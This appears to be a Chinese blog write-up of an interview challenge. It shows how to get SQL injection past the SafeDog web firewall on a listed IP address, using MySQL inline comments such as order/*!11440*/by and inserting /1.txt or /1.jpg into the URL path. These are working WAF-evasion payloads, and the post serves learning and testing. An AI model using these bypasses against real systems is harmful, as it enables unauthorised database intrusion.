当你的才华
还撑不起你的野心时
那你就应该静下心来学习
在原文章链接:一个面试题 看到的文章觉得挺有意思的,所以也去试了一下。
之前网上说过,利用脏数据(垃圾字符),来绕WAF,是可以的,有脚本可以绕,也可以尝试Fuzz 看看哪些是规则之外的来组合绕过。
看到tools 师傅的一句话,把我... ... 如下:
绕过安全狗的另一种方法,可能安全狗认为txt和jpg文件是安全的,所以可以使用.txt和.jpg来绕过安全狗
面试题链接:
http://111.73.45.72/1.aspx?id=1
尝试一下,简单判断一哈。
有安全狗WAF... ...,这... ...为什么只要是做靶场就拿狗来出气,我勒个去(/哭笑不得)
使用/*!11440*/绕过
order/*!11440*/by 5
确定了八个字段
我去... ...,好像很多人都在使用.. ...,那就不测试了,看原文章作者所说的,没啥特别奇怪的,就是常规手段即可通关,这关主要考察的是你有没有绕WAF的知识
PS:出现如下链接,可能时太多人进行测试了,导致连接池饱满
此处主要是想说的是... ...
http://111.73.45.72/1.aspx?id=1 order by 8
?id前面加1.txt,成功绕过?
http://111.73.45.72/1.aspx/1.txt?id=1 order by 8
?id前面加1.txt,成功绕过?
http://111.73.45.72/1.aspx/1.txt?id=1 order by 8
?id前面加1.jpg,成功绕过?
http://111.73.45.72/1.aspx/1.jpg?id=1 order by 8
参考链接:
https://www.t00ls.net/articles-56550.html
虽然我们生活在阴沟里,但依然有人仰望星空!